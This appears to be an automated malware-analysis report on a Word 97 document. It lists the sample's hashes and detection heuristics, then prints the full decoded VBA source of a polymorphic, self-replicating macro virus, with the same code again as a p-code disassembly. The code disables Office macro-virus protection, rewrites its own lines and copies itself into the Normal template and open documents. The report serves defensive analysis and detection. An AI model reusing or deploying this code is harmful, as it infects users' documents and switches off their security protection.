Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 7d3133fdddedefb3…

MALICIOUS

Office (OLE) / .DOC

38.0 KB Created: 2001-10-27 23:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8162cde86e8bc78b1db748e865a07582 SHA-1: cb78f8b95a7a6352bfb9a35b30fbf3d79fbdea75 SHA-256: 7d3133fdddedefb371961c3a245f6ed3512c779036a0291170e602bd8a5710b8
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1542.001 System Initialization: Boot or Logon Autostart Execution

The sample is a Microsoft Word document containing VBA macros. Heuristics indicate that these macros are designed for self-replication and tampering with Office macro protection, suggesting a malicious intent to spread and evade security measures. The script actively rewrites its own code, making it difficult to analyze and potentially establishing persistence.

Heuristics 2

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine ZSZPE1, ZSZPE8

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23599 bytes
SHA-256: 901b6710fc0bef12e94b6ddfbb83c1731daa76acc5129616691bfb3bf5d2b8ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Encrypt a virus:
' ~~~~~~~~~~~~~~~~

Private Sub Document_Close()
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
On Error Resume Next    ' ìóñîð
For ZSZPE1 = 34 To 106
Application.ActiveWindow.Activate
ZSZPE2 = Null
Options.CreateBackup = True
ZSZPE3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(ZSZPE1, 1))
Options.CreateBackup = True
ZSZPE4 = Asc((Mid(ZSZPE3, 2, 1)))
Options.SaveNormalPrompt = False
ZSZPE5 = ZSZPE4 Xor 39
Randomize
For ZSZPE6 = 3 To Len(ZSZPE3)
Options.SaveNormalPrompt = False
ZSZPE7 = Asc(Mid(ZSZPE3, ZSZPE6, 1)) Xor ZSZPE5
Options.InsertedTextColor = wdAuto
ZSZPE2 = ZSZPE2 & Chr(ZSZPE7)
Options.SaveNormalPrompt = False
Next ZSZPE6
Randomize
ZSZPE8 = ZSZPE2
If VT = 39 Then JY = 2
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine ZSZPE1, ZSZPE8
Options.BackgroundSave = True
Next ZSZPE1
If NT = 21 Then BO = 13
Call ZSZPE
Application.ActiveWindow.Activate
End Sub
'Zd0B SHi ZduB p0LyM0RHiC ENGiNe By ULTRAS/MATRiX
Private Sub ZSZPE()
' Hwsnhit)DubfsbEfdlrw':'Surb
'&Gns!y{!<!3!Un!017!Rudq!3
'"Juqljkv+Fw`dq`Gdfnpu%8%Qwp`
'/f}e(5(Af| Zfl("(1!(#(9
'#Ktpmkjw*Mjwavpa`Pa|pGkhkv$9$s`Eqpk
'!O`&hsk&;&7&Rnch&|ik"&;&$Tghbiko|c$
'"Juqljkv+Lkv`wq`aQ`}qFjijw%8%raDpqj
'"Lc%kph%8%7%Qm`k% jh!%8%'Dfqls`Ajfph`kq+Vds`'
'#Etthmgepmkj*EgpmraSmj`ks*Egpmrepa
'$Je#mvn#>#0#Wkfm#yln'#>#!Lswjlmp-@qfbwfAb`hvs#>#Wqvf!
'#Ktpmkjw*Fegocvkqj`Wera$9$Pvqa
'$Je#mvn#>#7#Wkfm#yln'#>#!Je#!#%#@kq+Jmw+Qmg#)#16*#(#56*#%#@kq+Jmw+Qmg#)#16*#(#56*#%#!#>#!#%#@Pwq+Jmw+Qmg#)#76**#%#!Wkfm#!#%#@kq+Jmw+Qmg#)#16*#(#56*#%#@kq+Jmw+Qmg#)#16*#(#56*#%#!#>#!#%#@Pwq+Jmw+Qmg#)#76**
'&Nquhnor/C`bjfsntoeR`wd!<!Ustd
'%Kd"lwo"?"7"Vjgl"xmo&"?" Ml"Gppmp"Pgqwog"Lgzv
'/Gx|agf{&Kzmi|mJikc}x(5(\z}m
'&Hg!otl!<!7!Uido!{nl%!<!#@qqmhb`uhno/@buhwdVhoenv/@buhw`ud#
'#Ktpmkjw*WeraJkviehTvkitp$9$Behwa
'$Je#mvn#>#4#Wkfm#yln'#>#!Lswjlmp-PbufMlqnboSqlnsw#>#Ebopf!
'#Ktpmkjw*Fegocvkqj`Wera$9$Pvqa
'%Kd"lwo"?":"Vjgl"xmo&"?" Mrvkmlq,KlqgpvgfVgzvAmnmp"?"ufCwvm
'#Ktpmkjw*GvaepaFegoqt$9$Pvqa
'$Je#mvn#>#:#Wkfm#yln'#>#!Lswjlmp-Ab`hdqlvmgPbuf#>#Wqvf!
'!Ih&Cttit&Tcuskc&Hc~r
'"QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`+W`uidf`Ilk`%} )% jh!
'%Pclfmokxg
'/Fmp|(pr
'!Ivroihu(DgematishbUgpc&;&Rtsc
'"QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`+W`uidf`Ilk`%67)%'"_a5G%VMl%_apG%u5I|H5WMlF%@KBlK`%G|%PIQWDV*HDQWl]'
'#Ktpmkjw*WeraJkviehTvkitp$9$Behwa
'&Gns![R[QD0!<!25!Un!017
' Ufichjn}b
'#^W^TA6$9$Jqhh
' Fwwkndfsnhi)FdsnqbPnichp)Fdsnqfsb
'"_V_U@6%8%'"'%#%-QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`+Ilk`v-_V_U@4)%4,,
' Ufichjn}b
'&[R[QD5!<!Hou)Soe)(!+!9(!*!0
'%Pclfmokxg
'&Gns![R[QD4!<!0!Un!Mdo)[R[QD2(
'&Nquhnor/HordsudeUdyuBnmns!<!ve@tun
'$YPYSF5#>#Bp`+Njg+YPYSF0/#YPYSF6/#2**#[lq#YPYSF7
'%Mrvkmlq,Apgcvg@caiwr"?"Vpwg
'&[R[QD3!<![R[QD3!'!Bis)[R[QD7(
'"Wdkajhl `
'!Hc~r&\U\VC3
'"Juqljkv+Fw`dq`Gdfnpu%8%Qwp`
' ]T]WB0':']T]WB5
'&Hg!IY!<!03!Uido!XJ!<!6
'%VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,PgrncagNklg"XQXRG3." % "$"XQXRG5
'!GeropcBieskchr(Ugpc
'#Ja|p$^W^TA5
'$Bssoj`bwjlm-B`wjufTjmglt-B`wjubwf
'%Mrvkmlq,TkpwqRpmvgavkml"?"Dcnqg
'!O`&MT&;&?&Rnch&OV&;&>
'/Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m
'"Duuilfdqljk+Dfqls`Rlkajr+Dfqlsdq`
'&Nquhnor/BnoghslBnowdsrhnor!<!G`mrd
' Ufichjn}b
'#P@$9$Plmw@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*Hmjaw,5($Plmw@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*GkqjpKbHmjaw-
'#Kj$Avvkv$Vawqia$Ja|p
'#Wap$JP$9$JkviehPaithepa*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha
'%Mrvkmlq,@caiepmwlfQctg"?"Vpwg
'$MW-GfofwfOjmfp#2/#MW-@lvmwLeOjmfp
'&Nquhnor/Bsd`udC`bjtq!<!Ustd
'"KQ+DaaCwjhVqwlkb%QA
'%Mrvkmlq,KlqgpvgfVgzvAmnmp"?"ufCwvm
'/[m|(^I(5(Ik|a~mLgk}emf|&^JXzgbmk|&^JKgexgfmf|{&A|me 9!&KglmEgl}dm
'&Hg!IV!<!08!Uido!QQ!<!5
'#RE*@ahapaHmjaw$5($RE*GkqjpKbHmjaw
'$Bssoj`bwjlm-B`wjufTjmglt-B`wjubwf
' QF)FccAuhjTsuni`'SC
' Hwsnhit)TfqbIhujfkWuhjws':'Afktb
'$B`wjufGl`vnfmw-PbufBp#EjofMbnf9>B`wjufGl`vnfmw-EvooMbnf
'!Ivroihu(DgematishbUgpc&;&Rtsc
End Sub


'Not Encrypt a virus:
'~~~~~~~~~~~~~~~~~~~~
 
Private Sub Document_Close()

Application.EnableCancelKey = wdCancelDisabled

For ZSZPE1 = 34 To 106

ZSZPE2 = Null

ZSZPE3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(ZSZPE1, 1))

ZSZPE4 = Asc((Mid(ZSZPE3, 2, 1)))

ZSZPE5 = ZSZPE4 Xor 39

For ZSZPE6 = 3 To Len(ZSZPE3)

ZSZPE7 = Asc(Mid(ZSZPE3, ZSZPE6, 1)) Xor ZSZPE5

ZSZPE2 = ZSZPE2 & Chr(ZSZPE7)

Next ZSZPE6

ZSZPE8 = ZSZPE2

ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine ZSZPE1, ZSZPE8

Next ZSZPE1

Call ZSZPE

End Sub

Private Sub ZSZPE()

For xz = 2 To 106 Step 2

num = Int(Rnd * 9) + 1

If num = 1 Then zom$ = "Randomize"

If num = 2 Then zom$ = "ActiveDocument.Save"

If num = 3 Then zom$ = "Options.CreateBackup = True"

If num = 4 Then zom$ = "If " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45)) & "Then " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45))

If num = 5 Then zom$ = "On Error Resume Next"

If num = 6 Then zom$ = "Application.ActiveWindow.Activate"

If num = 7 Then zom$ = "Options.SaveNormalPrompt = False"

If num = 8 Then zom$ = "Options.InsertedTextColor = wdAuto"

If num = 9 Then zom$ = "Options.BackgroundSave = True"

ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine xz, zom$

Next xz

ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 32, "'Zd0B SHi ZduB p0LyM0RHiC ENGiNe By ULTRAS/MATRiX"

For ZSZPE1 = 34 To 106

ZSZPE2 = Null

ZSZPE3 = "'" & (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(ZSZPE1, 1))

ZSZPE4 = Int(Rnd() * 8) + 1

For ZSZPE5 = 1 To Len(ZSZPE3)

ZSZPE6 = Asc(Mid(ZSZPE3, ZSZPE5, 1)) Xor ZSZPE4

ZSZPE2 = ZSZPE2 & Chr(ZSZPE6)

Next ZSZPE5

ZSZPE7 = ZSZPE2

ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine ZSZPE1, "'" & ZSZPE7

Next ZSZPE1

Options.VirusProtection = False

Options.SaveNormalPrompt = False

Options.ConfirmConversions = False

TD = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)

Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule

NT.DeleteLines 1, NT.CountOfLines

NT.AddFromString TD

Set VA = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule

VA.DeleteLines 1, VA.CountOfLines

VA.AddFromString TD

ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

End Sub

' Processing file: /tmp/tmpl6v6lpam
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 13680 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0011 " Encrypt a virus:"
' Line #1:
' 	QuoteRem 0x0000 0x0011 " ~~~~~~~~~~~~~~~~"
' Line #2:
' Line #3:
' 	FuncDefn (Private Sub Document_Close())
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #6:
' 	OnError (Resume Next) 
' 	QuoteRem 0x0018 0x0006 " ìóñîð"
' Line #7:
' 	StartForVariable 
' 	Ld ZSZPE1 
' 	EndForVariable 
' 	LitDI2 0x0022 
' 	LitDI2 0x006A 
' 	For 
' Line #8:
' 	Ld Application 
' 	MemLd ActiveWindow 
' 	ArgsMemCall Activate 0x0000 
' Line #9:
' 	LitVarSpecial (Null)
' 	St ZSZPE2 
' Line #10:
' 	LitVarSpecial (True)
' 	Ld Options 
' 	MemSt CreateBackup 
' Line #11:
' 	Ld ZSZPE1 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St ZSZPE3 
' Line #12:
' 	LitVarSpecial (True)
' 	Ld Options 
' 	MemSt CreateBackup 
' Line #13:
' 	Ld ZSZPE3 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Paren 
' 	ArgsLd Asc 0x0001 
' 	St ZSZPE4 
' Line #14:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #15:
' 	Ld ZSZPE4 
' 	LitDI2 0x0027 
' 	Xor 
' 	St ZSZPE5 
' Line #16:
' 	ArgsCall Read 0x0000 
' Line #17:
' 	StartForVariable 
' 	Ld ZSZPE6 
' 	EndForVariable 
' 	LitDI2 0x0003 
' 	Ld ZSZPE3 
' 	FnLen 
' 	For 
' Line #18:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #19:
' 	Ld ZSZPE3 
' 	Ld ZSZPE6 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld ZSZPE5 
' 	Xor 
' 	St ZSZPE7 
' Line #20:
' 	Ld wdAuto 
' 	Ld Options 
' 	MemSt InsertedTextColor 
' Line #21:
' 	Ld ZSZPE2 
' 	Ld ZSZPE7 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St ZSZPE2 
' Line #22:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #23:
' 	StartForVariable 
' 	Ld ZSZPE6 
' 	EndForVariable 
' 	NextVar 
' Line #24:
' 	ArgsCall Read 0x0000 
' Line #25:
' 	Ld ZSZPE2 
' 	St ZSZPE8 
' Line #26:
' 	Ld VT 
' 	LitDI2 0x0027 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0002 
' 	St JY 
' 	EndIf 
' Line #27:
' 	Ld ZSZPE1 
' 	Ld ZSZPE8 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #28:
' 	LitVarSpecial (True)
' 	Ld Options 
' 	MemSt BackgroundSave 
' Line #29:
' 	StartForVariable 
' 	Ld ZSZPE1 
' 	EndForVariable 
' 	NextVar 
' Line #30:
' 	Ld NT 
' 	LitDI2 0x0015 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x000D 
' 	St BO 
' 	EndIf 
' Line #31:
' 	ArgsCall (Call) ZSZPE 0x0000 
' Line #32:
' 	Ld Application 
' 	MemLd ActiveWindow 
' 	ArgsMemCall Activate 0x0000 
' Line #33:
' 	EndSub 
' Line #34:
' 	QuoteRem 0x0000 0x0030 "Zd0B SHi ZduB p0LyM0RHiC ENGiNe By ULTRAS/MATRiX"
' Line #35:
' 	FuncDefn (Private Sub ZSZPE())
' Line #36:
' 	QuoteRem 0x0000 0x001C " Hwsnhit)DubfsbEfdlrw':'Surb"
' Line #37:
' 	QuoteRem 0x0000 0x0019 "&Gns!y{!<!3!Un!017!Rudq!3"
' Line #38:
' 	QuoteRem 0x0000 0x001C ""Juqljkv+Fw`dq`Gdfnpu%8%Qwp`"
' Line #39:
' 	QuoteRem 0x0000 0x0017 "/f}e(5(Af| Zfl("(1!(#(9"
' Line #40:
' 	QuoteRem 0x0000 0x0023 "#Ktpmkjw*Mjwavpa`Pa|pGkhkv$9$s`Eqpk"
' Line #41:
' 	QuoteRem 0x0000 0x0023 "!O`&hsk&;&7&Rnch&|ik"&;&$Tghbiko|c$"
' Line #42:
' 	QuoteRem 0x0000 0x0023 ""Juqljkv+Lkv`wq`aQ`}qFjijw%8%raDpqj"
' Line #43:
' 	QuoteRem 0x0000 0x002D ""Lc%kph%8%7%Qm`k% jh!%8%'Dfqls`Ajfph`kq+Vds`'"
' Line #44:
' 	QuoteRem 0x0000 0x0022 "#Etthmgepmkj*EgpmraSmj`ks*Egpmrepa"
' Line #45:
' 	QuoteRem 0x0000 0x0035 "$Je#mvn#>#0#Wkfm#yln'#>#!Lswjlmp-@qfbwfAb`hvs#>#Wqvf!"
' Line #46:
' 	QuoteRem 0x0000 0x001E "#Ktpmkjw*Fegocvkqj`Wera$9$Pvqa"
' Line #47:
' 	QuoteRem 0x0000 0x00CB "$Je#mvn#>#7#Wkfm#yln'#>#!Je#!#%#@kq+Jmw+Qmg#)#16*#(#56*#%#@kq+Jmw+Qmg#)#16*#(#56*#%#!#>#!#%#@Pwq+Jmw+Qmg#)#76**#%#!Wkfm#!#%#@kq+Jmw+Qmg#)#16*#(#56*#%#@kq+Jmw+Qmg#)#16*#(#56*#%#!#>#!#%#@Pwq+Jmw+Qmg#)#76**"
' Line #48:
' 	QuoteRem 0x0000 0x001E "&Nquhnor/C`bjfsntoeR`wd!<!Ustd"
' Line #49:
' 	QuoteRem 0x0000 0x002D "%Kd"lwo"?"7"Vjgl"xmo&"?" Ml"Gppmp"Pgqwog"Lgzv"
' Line #50:
' 	QuoteRem 0x0000 0x001C "/Gx|agf{&Kzmi|mJikc}x(5(\z}m"
' Line #51:
' 	QuoteRem 0x0000 0x003B "&Hg!otl!<!7!Uido!{nl%!<!#@qqmhb`uhno/@buhwdVhoenv/@buhw`ud#"
' Line #52:
' 	QuoteRem 0x0000 0x0021 "#Ktpmkjw*WeraJkviehTvkitp$9$Behwa"
' Line #53:
' 	QuoteRem 0x0000 0x003A "$Je#mvn#>#4#Wkfm#yln'#>#!Lswjlmp-PbufMlqnboSqlnsw#>#Ebopf!"
' Line #54:
' 	QuoteRem 0x0000 0x001E "#Ktpmkjw*Fegocvkqj`Wera$9$Pvqa"
' Line #55:
' 	QuoteRem 0x0000 0x003B "%Kd"lwo"?":"Vjgl"xmo&"?" Mrvkmlq,KlqgpvgfVgzvAmnmp"?"ufCwvm"
' Line #56:
' 	QuoteRem 0x0000 0x001C "#Ktpmkjw*GvaepaFegoqt$9$Pvqa"
' Line #57:
' 	QuoteRem 0x0000 0x0037 "$Je#mvn#>#:#Wkfm#yln'#>#!Lswjlmp-Ab`hdqlvmgPbuf#>#Wqvf!"
' Line #58:
' 	QuoteRem 0x0000 0x0015 "!Ih&Cttit&Tcuskc&Hc~r"
' Line #59:
' 	QuoteRem 0x0000 0x004C ""QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`+W`uidf`Ilk`%} )% jh!"
' Line #60:
' 	QuoteRem 0x0000 0x000A "%Pclfmokxg"
' Line #61:
' 	QuoteRem 0x0000 0x0008 "/Fmp|(pr"
' Line #62:
' 	QuoteRem 0x0000 0x001E "!Ivroihu(DgematishbUgpc&;&Rtsc"
' Line #63:
' 	QuoteRem 0x0000 0x007B ""QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`+W`uidf`Ilk`%67)%'"_a5G%VMl%_apG%u5I|H5WMlF%@KBlK`%G|%PIQWDV*HDQWl]'"
' Line #64:
' 	QuoteRem 0x0000 0x0021 "#Ktpmkjw*WeraJkviehTvkitp$9$Behwa"
' Line #65:
' 	QuoteRem 0x0000 0x0017 "&Gns![R[QD0!<!25!Un!017"
' Line #66:
' 	QuoteRem 0x0000 0x000A " Ufichjn}b"
' Line #67:
' 	QuoteRem 0x0000 0x000E "#^W^TA6$9$Jqhh"
' Line #68:
' 	QuoteRem 0x0000 0x0022 " Fwwkndfsnhi)FdsnqbPnichp)Fdsnqfsb"
' Line #69:
' 	QuoteRem 0x0000 0x0059 ""_V_U@6%8%'"'%#%-QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`+Ilk`v-_V_U@4)%4,,"
' Line #70:
' 	QuoteRem 0x0000 0x000A " Ufichjn}b"
' Line #71:
' 	QuoteRem 0x0000 0x001C "&[R[QD5!<!Hou)Soe)(!+!9(!*!0"
' Line #72:
' 	QuoteRem 0x0000 0x000A "%Pclfmokxg"
' Line #73:
' 	QuoteRem 0x0000 0x001E "&Gns![R[QD4!<!0!Un!Mdo)[R[QD2("
' Line #74:
' 	QuoteRem 0x0000 0x0023 "&Nquhnor/HordsudeUdyuBnmns!<!ve@tun"
' Line #75:
' 	QuoteRem 0x0000 0x0030 "$YPYSF5#>#Bp`+Njg+YPYSF0/#YPYSF6/#2**#[lq#YPYSF7"
' Line #76:
' 	QuoteRem 0x0000 0x001C "%Mrvkmlq,Apgcvg@caiwr"?"Vpwg"
' Line #77:
' 	QuoteRem 0x0000 0x001E "&[R[QD3!<![R[QD3!'!Bis)[R[QD7("
' Line #78:
' 	QuoteRem 0x0000 0x000A ""Wdkajhl `"
' Line #79:
' 	QuoteRem 0x0000 0x000C "!Hc~r&\U\VC3"
' Line #80:
' 	QuoteRem 0x0000 0x001C ""Juqljkv+Fw`dq`Gdfnpu%8%Qwp`"
' Line #81:
' 	QuoteRem 0x0000 0x0010 " ]T]WB0':']T]WB5"
' Line #82:
' 	QuoteRem 0x0000 0x0017 "&Hg!IY!<!03!Uido!XJ!<!6"
' Line #83:
' 	QuoteRem 0x0000 0x0058 "%VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,PgrncagNklg"XQXRG3." % "$"XQXRG5"
' Line #84:
' 	QuoteRem 0x0000 0x0014 "!GeropcBieskchr(Ugpc"
' Line #85:
' 	QuoteRem 0x0000 0x000C "#Ja|p$^W^TA5"
' Line #86:
' 	QuoteRem 0x0000 0x0022 "$Bssoj`bwjlm-B`wjufTjmglt-B`wjubwf"
' Line #87:
' 	QuoteRem 0x0000 0x0020 "%Mrvkmlq,TkpwqRpmvgavkml"?"Dcnqg"
' Line #88:
' 	QuoteRem 0x0000 0x0016 "!O`&MT&;&?&Rnch&OV&;&>"
' Line #89:
' 	QuoteRem 0x0000 0x0021 "/Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m"
' Line #90:
' 	QuoteRem 0x0000 0x0022 ""Duuilfdqljk+Dfqls`Rlkajr+Dfqlsdq`"
' Line #91:
' 	QuoteRem 0x0000 0x0023 "&Nquhnor/BnoghslBnowdsrhnor!<!G`mrd"
' Line #92:
' 	QuoteRem 0x0000 0x000A " Ufichjn}b"
' Line #93:
' 	QuoteRem 0x0000 0x008A "#P@$9$Plmw@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*Hmjaw,5($Plmw@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*GkqjpKbHmjaw-"
' Line #94:
' 	QuoteRem 0x0000 0x0015 "#Kj$Avvkv$Vawqia$Ja|p"
' Line #95:
' 	QuoteRem 0x0000 0x0042 "#Wap$JP$9$JkviehPaithepa*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha"
' Line #96:
' 	QuoteRem 0x0000 0x001E "%Mrvkmlq,@caiepmwlfQctg"?"Vpwg"
' Line #97:
' 	QuoteRem 0x0000 0x0022 "$MW-GfofwfOjmfp#2/#MW-@lvmwLeOjmfp"
' Line #98:
' 	QuoteRem 0x0000 0x001C "&Nquhnor/Bsd`udC`bjtq!<!Ustd"
' Line #99:
' 	QuoteRem 0x0000 0x0014 ""KQ+DaaCwjhVqwlkb%QA"
' Line #100:
' 	QuoteRem 0x0000 0x0023 "%Mrvkmlq,KlqgpvgfVgzvAmnmp"?"ufCwvm"
' Line #101:
' 	QuoteRem 0x0000 0x0042 "/[m|(^I(5(Ik|a~mLgk}emf|&^JXzgbmk|&^JKgexgfmf|{&A|me 9!&KglmEgl}dm"
' Line #102:
' 	QuoteRem 0x0000 0x0017 "&Hg!IV!<!08!Uido!QQ!<!5"
' Line #103:
' 	QuoteRem 0x0000 0x0022 "#RE*@ahapaHmjaw$5($RE*GkqjpKbHmjaw"
' Line #104:
' 	QuoteRem 0x0000 0x0022 "$Bssoj`bwjlm-B`wjufTjmglt-B`wjubwf"
' Line #105:
' 	QuoteRem 0x0000 0x0014 " QF)FccAuhjTsuni`'SC"
' Line #106:
' 	QuoteRem 0x0000 0x0021 " Hwsnhit)TfqbIhujfkWuhjws':'Afktb"
' Line #107:
' 	QuoteRem 0x0000 0x0038 "$B`wjufGl`vnfmw-PbufBp#EjofMbnf9>B`wjufGl`vnfmw-EvooMbnf"
' Line #108:
' 	QuoteRem 0x0000 0x001E "!Ivroihu(DgematishbUgpc&;&Rtsc"
' Line #109:
' 	EndSub 
' Line #110:
' Line #111:
' Line #112:
' 	QuoteRem 0x0000 0x0014 "Not Encrypt a virus:"
' Line #113:
' 	QuoteRem 0x0000 0x0014 "~~~~~~~~~~~~~~~~~~~~"
' Line #114:
' Line #115:
' 	FuncDefn (Private Sub Document_Close())
' Line #116:
' Line #117:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #118:
' Line #119:
' 	StartForVariable 
' 	Ld ZSZPE1 
' 	EndForVariable 
' 	LitDI2 0x0022 
' 	LitDI2 0x006A 
' 	For 
' Line #120:
' Line #121:
' 	LitVarSpecial (Null)
' 	St ZSZPE2 
' Line #122:
' Line #123:
' 	Ld ZSZPE1 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St ZSZPE3 
' Line #124:
' Line #125:
' 	Ld ZSZPE3 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Paren 
' 	ArgsLd Asc 0x0001 
' 	St ZSZPE4 
' Line #126:
' Line #127:
' 	Ld ZSZPE4 
' 	LitDI2 0x0027 
' 	Xor 
' 	St ZSZPE5 
' Line #128:
' Line #129:
' 	StartForVariable 
' 	Ld ZSZPE6 
' 	EndForVariable 
' 	LitDI2 0x0003 
' 	Ld ZSZPE3 
' 	FnLen 
' 	For 
' Line #130:
' Line #131:
' 	Ld ZSZPE3 
' 	Ld ZSZPE6 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld ZSZPE5 
' 	Xor 
' 	St ZSZPE7 
' Line #132:
' Line #133:
' 	Ld ZSZPE2 
' 	Ld ZSZPE7 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St ZSZPE2 
' Line #134:
' Line #135:
' 	StartForVariable 
' 	Ld ZSZPE6 
' 	EndForVariable 
' 	NextVar 
' Line #136:
' Line #137:
' 	Ld ZSZPE2 
' 	St ZSZPE8 
' Line #138:
' Line #139:
' 	Ld ZSZPE1 
' 	Ld ZSZPE8 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #140:
' Line #141:
' 	StartForVariable 
' 	Ld ZSZPE1 
' 	EndForVariable 
' 	NextVar 
' Line #142:
' Line #143:
' 	ArgsCall (Call) ZSZPE 0x0000 
' Line #144:
' Line #145:
' 	EndSub 
' Line #146:
' Line #147:
' 	FuncDefn (Private Sub ZSZPE())
' Line #148:
' Line #149:
' 	StartForVariable 
' 	Ld xz 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	LitDI2 0x006A 
' 	LitDI2 0x0002 
' 	ForStep 
' Line #150:
' Line #151:
' 	Ld Rnd 
' 	LitDI2 0x0009 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St num 
' Line #152:
' Line #153:
' 	Ld num 
' 	LitDI2 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0009 "Randomize"
' 	St zom$ 
' 	EndIf 
' Line #154:
' Line #155:
' 	Ld num 
' 	LitDI2 0x0002 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0013 "ActiveDocument.Save"
' 	St zom$ 
' 	EndIf 
' Line #156:
' Line #157:
' 	Ld num 
' 	LitDI2 0x0003 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x001B "Options.CreateBackup = True"
' 	St zom$ 
' 	EndIf 
' Line #158:
